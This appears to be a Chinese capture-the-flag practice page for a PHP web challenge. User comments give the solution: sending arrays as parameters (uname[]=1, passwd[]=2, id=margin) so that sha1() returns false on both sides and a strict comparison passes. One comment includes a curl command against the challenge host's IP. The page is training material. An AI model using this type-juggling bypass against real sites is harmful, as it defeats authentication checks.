各种绕过哟WEB 未解决

分数: 30 金币: 3
题目作者: harry
一  血: jiangdie666
一血奖励: 2金币
解  决: 5459
提  示:
描  述:
各种绕过
评论
脚本gay 1月前

解题关键:PHP SHA1 函数漏洞 PHP 中,sha1() 函数无法处理数组,传入数组会返回 false,且是强类型的 false。 sha1(array()) → false sha1(array(1)) → false 两个不同数组,sha1 结果都是 false,满足 === 强相等 同时,数组和数组在 == 弱比较中不相等,完美绕过第一层判断!

回复 0

是小白鸭 2月前

明白咯 要在bp的repeater里面修改,get请求在头部,post请求在尾部。

回复 0

奔跑的开开 5月前

hackbar构造?uname[]=1&id=margin(get) ,passwd[]=2(post)

回复 2
qq1002517 2月前

6

回复 0

5883120xly 6月前

在url上加/?id=margin&uname[]=111a 在POST中加passwd[]=2

回复 3

lwgzs 6月前

curl -d '

回复 0

dbcjmc 6月前

这题其实很简单,要掌握MD5== 与===的特性就能轻松绕过去,在hackbar我们先传入get的?id=margin&uname[]=1然后再post传入passwd[]=2数组里面什么值都行===遇到数组都是null所以满足条件

回复 1

zxcvbnmzhang 8月前

curl -X POST "http://117.72.52.127:16987/?uname[]=a&id=margin" -d "passwd[]=b"

回复 0

asddddd 8月前

我用0e绕过sha1为啥不行,为什么只能数组绕过

回复 0
ShawnWang04 6月前

因为是=== 不是==

回复 0

一个姓⎝李⎠的师傅~ 8月前

题目挺好,各种细节和基础知识的考验,基础知识恶补: https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#VbWHy

回复 3

ubudj 8月前

?uname[]=1&id=margin POST: passwd[]=2

回复 0

WriteUp

image
harry

3 金币

评分(4)

解题动态

cisp7 攻破了该题 2小时前
yuu鱼 攻破了该题 4小时前
Grisha 攻破了该题 7小时前
box 攻破了该题 11小时前
liu121389 攻破了该题 12小时前
sokfock 攻破了该题 1天前
yyy1024 攻破了该题 1天前
admincon 攻破了该题 1天前
sdaddsdad 攻破了该题 1天前
旦旦 攻破了该题 1天前
bjyuxiao 攻破了该题 1天前
白科技 攻破了该题 1天前
bubu1212 攻破了该题 1天前
yangtaoLE 攻破了该题 2天前
掘金 攻破了该题 2天前
小星 攻破了该题 2天前
123456789000000 攻破了该题 3天前
无所取也 攻破了该题 3天前
西瓜碧玺 攻破了该题 3天前
Ed1fIer 攻破了该题 3天前
问题反馈